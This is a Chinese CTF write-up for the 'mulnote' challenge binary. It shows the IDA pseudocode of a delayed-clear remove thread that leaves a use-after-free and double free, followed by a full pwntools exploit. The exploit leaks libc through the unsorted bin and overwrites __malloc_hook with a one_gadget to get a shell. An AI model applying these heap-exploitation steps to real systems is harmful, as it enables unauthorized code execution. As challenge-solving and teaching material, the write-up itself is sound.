

本文编写于 436 天前,最后修改于 118 天前,其中某些信息可能已经过时。

程序分析

先用 checksec 看一下保护:没有 canary,但开了 PIE 和 Full RELRO,GOT 表不可写,所以后面劫持控制流要走 libc 里的 __malloc_hook 而不是改 GOT。

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
Welcome to mulnote:
[C]reate
[E]dit
[R]emove
[S]how
[Q]uit
>

用 IDA 看伪代码时,发现 delete 的真正工作是放在一个线程(start_routine)里做的:先 free 掉 chunk,然后 sleep 10 秒,之后才把指针数组里对应的项清零。
也就是说 free 之后的 10 秒内指针并没有被清空,show/edit/remove 仍然能用这个悬空指针——这就是 UAF;连续 remove 同一个 index 还能构成 double free。注意整个利用要在这个时间窗口内完成。

/* Worker routine behind "[R]emove" (IDA pseudocode; presumably handed to
 * pthread_create by the remove handler, with the note index smuggled in
 * through the void* argument `a1`).
 *
 * The chunk is free()d immediately, but the table slot qword_202020[idx]
 * is only cleared after a 10 second sleep. For that whole window the slot
 * still holds the freed pointer, so Show/Edit/Remove operate on freed
 * memory (use-after-free), and calling Remove again on the same index
 * frees the chunk twice (double free). */
void *__fastcall start_routine(void *a1)
{
  free((void *)qword_202020[(_QWORD)a1]);   /* chunk released right away */
  sleep(0xAu);                              /* 10 s during which the stale pointer stays in the table */
  qword_202020[(_QWORD)a1] = 0LL;           /* slot is cleared only now */
  return 0LL;
}

利用思路

1. 利用 unsorted bin 泄露 libc 地址:申请一个 0xf8 的 note(chunk 实际大小 0x100,超出 fastbin 范围),free 后进入 unsorted bin,其 fd 指向 main_arena+88;趁指针还没被清零时 show 出来,减去偏移就得到 libc 基址。
2. 利用 fastbin double free 把 __malloc_hook 改成 one_gadget:对两个 0x60 的 note 按 1、2、1 的顺序 remove(fastbin 的 double free 检测只比较链表头,这样能绕过),再把 fd 改成 main_arena-0x23 处的伪 chunk,malloc 到它之后就能覆盖 __malloc_hook,最后再 create 一次触发 malloc 即可 getshell。

from pwn import *

# Exploit configuration. DEBUG picks which libc the offsets refer to; the
# target binary is spawned the same way in both cases (no remote branch).
# arena_off is the offset of main_arena inside libc (the leak below reads
# main_arena+88), one_gadget is the libc-relative address of a one-shot
# execve gadget for that same build.
DEBUG=0
recv_banner = ">"
r = process("./mulnote")
if DEBUG:
    # local libc: print the pid so a debugger can be attached
    print(pidof(r))
    one_gadget = 0x4647c
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    arena_off = 0x3C2760
else:
    # libc shipped with the challenge; presumably the Ubuntu 16.04 glibc 2.23
    # build (0x3c4b20 / 0x4526a are its well-known offsets) -- confirm.
    arena_off = 0x3C4B20
    one_gadget = 0x4526a
    libc = ELF("./libc.so")

def menu(op):
    """Choose a main-menu entry: wait for the `>` prompt, then send `op` + newline."""
    choice = str(op)
    r.sendlineafter(recv_banner, choice)

def edit(idx,content,size=False):
    """Select the [E]dit menu entry.

    NOTE(review): this is a stub -- `idx`, `content` and `size` are accepted
    but never sent, so no note is actually edited. The exploit below never
    calls it; only Create/Remove/Show are needed.
    """
    r.sendlineafter(recv_banner, "E")

def add(size,content):
    """[C]reate a note of `size` bytes holding `content`.

    `content` goes out with send() (no trailing newline) so raw p64 bytes
    reach the program untouched. The two bare recv() calls only drain the
    size/content prompts; they return as soon as any output is available,
    which presumably suffices because the target reads its input lazily.
    """
    r.sendlineafter(recv_banner, "C")
    r.recv()                 # size prompt
    r.sendline(str(size))
    r.recv()                 # content prompt
    r.send(str(content))
    
def delete(idx):
    """[R]emove note `idx`.

    The program free()s the chunk immediately but clears the table slot only
    after a 10 s sleep in a worker thread, so the slot remains usable (UAF /
    double free) during that window.
    """
    menu("R")
    r.recv()                 # index prompt
    r.sendline("%s" % idx)
def show(idx):
    """[S]how notes.

    `idx` is kept for symmetry with the other helpers but is not sent: the
    exploit then waits for "[*]note[0]:", which suggests Show dumps the notes
    without asking for an index (the author left the index send commented out).
    """
    r.sendlineafter(recv_banner, "S")

# ---- Stage 1: leak libc through the unsorted bin ---------------------------
# A 0xf8 request becomes a 0x100 chunk, too large for the fastbins, so freeing
# it puts it in the unsorted bin (note 1 sits between it and the top chunk, so
# it is not consolidated). Its fd then points into main_arena.
add(0xf8,'a')   # note 0: the chunk that gets freed and read back
add(0x60,'a')   # note 1: 0x70 fastbin chunk, also keeps note 0 away from top
add(0x60,'a')   # note 2: second 0x70 chunk for the double free
add(0x10,'a')   # note 3: small chunk; its exact role is not obvious -- possibly just heap-layout padding
delete(0)       # free() happens now; the slot keeps the dangling pointer for 10 s (see start_routine)
show(0)         # UAF read of the freed chunk: prints its fd/bk
r.recvuntil("[*]note[0]:\n")
# fd is the unsorted-bin head inside main_arena (main_arena+88 on this glibc);
# strip that and main_arena's offset to get the libc base.
libc_addr = u64(r.recv(6).ljust(8,"\x00"))-88-arena_off
success("libc_addr: " + hex(libc_addr))
one_gadget_addr = libc_addr + one_gadget

# ---- Stage 2: fastbin double free -> __malloc_hook -------------------------
# Take the 0x100 chunk back out of the unsorted bin so it cannot interfere
# with the fastbin allocations that follow.
add(0xf8,'a')
# Free 1, 2, 1: glibc's fastbin double-free check only compares against the
# bin head, so this pattern passes and note 1's chunk is linked twice. All
# three Remove threads are still asleep, so no slot has been cleared yet.
delete(1)
delete(2)
delete(1)
# First 0x60 allocation hands back note 1's chunk while it is still in the
# bin; writing its fd points the bin at a fake chunk at main_arena-0x23
# (= __malloc_hook-0x13, with __malloc_hook at main_arena-0x10 on glibc 2.23).
# NOTE(review): the fake chunk's size field (main_arena-0x1b) must read as a
# 0x7? value from the surrounding libc pointer bytes or the fastbin size check
# aborts -- verify with find_fake_fast against the exact target libc.
add(0x60,p64(libc_addr+arena_off-0x20-3))
add(0x60,'a')   # returns note 2's chunk
add(0x60,'a')   # returns note 1's chunk again (second copy); bin now points at the fake chunk
# The fake chunk's user data starts at main_arena-0x13, so 3 bytes of padding
# place the gadget address exactly on __malloc_hook.
payload = 'a'*3+p64(one_gadget_addr)
add(0x60,payload)

# ---- Stage 3: trigger ------------------------------------------------------
# Any further malloc() now goes through __malloc_hook. one_gadget has register/
# stack constraints; if it does not pop a shell, try a different gadget offset.
r.recvuntil(">")
r.sendline("C")
r.recv()
r.interactive()